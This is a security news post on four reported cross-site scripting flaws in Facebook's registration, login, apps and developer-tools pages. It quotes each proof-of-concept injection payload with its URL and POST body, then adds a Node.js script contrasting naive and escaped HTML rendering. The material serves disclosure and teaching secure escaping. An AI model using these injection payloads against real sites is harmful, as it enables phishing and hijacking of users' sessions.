Four Cross-Site Scripting Vulnerabilities Found on Facebook Pose Serious Privacy Risk
XSSed.com today reported four cross-site scripting (XSS) flaws affecting Facebook's developer tools page, login page and new-user registration page. Because injected script runs on a genuine facebook.com page, the flaws could help attackers make spam and phishing campaigns look authentic, and could be used to push malware or spyware to both new and registered Facebook users.
The flaws have already been reported to Facebook. So far there are no known cases of active exploitation, and Facebook is usually quick to react once notified.
Latest Facebook XSS vulnerabilities as they are reported on XSSed:
XSS #1 with POST (by Zeitjak)
http://www.new.facebook.com/r.php
POST: reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
XSS #2 with POST (by David Wharton)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F
POST:
email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3 (by DaiMon)
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E
This one works on another IP (67.228.87.82) and can't be used for a worm, only for phishing.
XSS #4 with POST (by p3lo)
http://developers.facebook.com/tools.php?fbml
POST:
profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
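The pattern the four reports share, shown as an added example (not code from XSSed, the individual reporters or Facebook): a request parameter is concatenated into the response without escaping for the HTML context it lands in. The script below, assumed to run under Node.js, takes the payloads quoted above (URL-decoded; the XSS #1 quotes normalized to plain ASCII, the XSS #4 value cut after its first script element), renders each through a naive template and through one that escapes for attribute and text context, and checks whether the input added any tag or event handler to the page. The field names and the markup around them are assumptions for illustration; XSS #3 is omitted because it is the same close-the-attribute breakout as XSS #2, only via GET.

```javascript
// Added example, not code from XSSed, the reporters or Facebook. It shows the
// single bug behind all four reports: a request parameter concatenated into
// HTML without context-aware escaping. Run with: node reflected_xss.js

// Sample values built from the payloads quoted in the post, decoded from their
// URL-encoded form. The XSS #4 value keeps only the </title><script> part.
// Field names and the surrounding markup are assumptions for illustration.
const samples = {
  // XSS #1: closes a double-quoted attribute and adds an event handler
  reg_email__: `"onmouseover="alert('XSS - ZJ')"foo="bar`,
  // XSS #2: closes the attribute and the tag, then injects a <script> element
  email: decodeURIComponent(
    "biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22"),
  // XSS #4: closes a <title> element (RCDATA, where tags are otherwise inert)
  api_key: decodeURIComponent(
    "%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"),
};

// Vulnerable rendering: raw string concatenation into an attribute value.
function renderVulnerable(field, value) {
  return `<input type="text" name="${field}" value="${value}">`;
}

// Vulnerable rendering into <title>: no tag can start inside RCDATA, but a
// literal </title> ends the element and returns the parser to normal HTML.
function renderTitleVulnerable(value) {
  return `<title>FBML test: ${value}</title>`;
}

// Escape the five characters that can change meaning in HTML text content or
// in a quoted attribute value. This is the minimum for those two contexts;
// an unquoted attribute, a JavaScript string or a URL needs different rules.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(field, value) {
  return `<input type="text" name="${field}" value="${escapeHtml(value)}">`;
}

function renderTitleHardened(value) {
  return `<title>FBML test: ${escapeHtml(value)}</title>`;
}

// Crude breakout detector, good enough for these samples: count tag openers
// and attribute-position event handlers in the rendered markup and compare
// with the same template rendered with an empty value. Any extra tag or on*=
// handler came from the input. Production code should use a real HTML parser,
// or better, a templating engine that escapes by default.
function countTags(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length;
}
function countHandlers(html) {
  // a handler may follow whitespace or, as in XSS #1, the closing quote
  return (html.match(/["'\s]on[a-z]+\s*=/gi) || []).length;
}
function staysInContext(render, value) {
  const base = render("");
  const out = render(value);
  return countTags(out) === countTags(base) &&
         countHandlers(out) === countHandlers(base);
}

function main() {
  for (const [field, value] of Object.entries(samples)) {
    const vuln = field === "api_key" ? renderTitleVulnerable
                                     : (v) => renderVulnerable(field, v);
    const safe = field === "api_key" ? renderTitleHardened
                                     : (v) => renderHardened(field, v);
    const verdict = (ok) => (ok ? "intact" : "BROKEN OUT");
    console.log(`${field}: vulnerable=${verdict(staysInContext(vuln, value))}, ` +
                `hardened=${verdict(staysInContext(safe, value))}`);
    console.log("  " + safe(value));
  }
}
main();
```

Two points the output makes visible: escaping `"` is what stops XSS #1, and escaping `<` is what stops XSS #2 and #4, so a filter that only strips `<script>` would still leave the attribute breakout open. The `<title>` case also shows why the escaping must be chosen by the context the value lands in, not by the value itself.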
Facebook users are advised not to accept friend invitations from strangers, not to follow Facebook links sent by email from unknown sources, and to report suspicious requests to Facebook's security staff.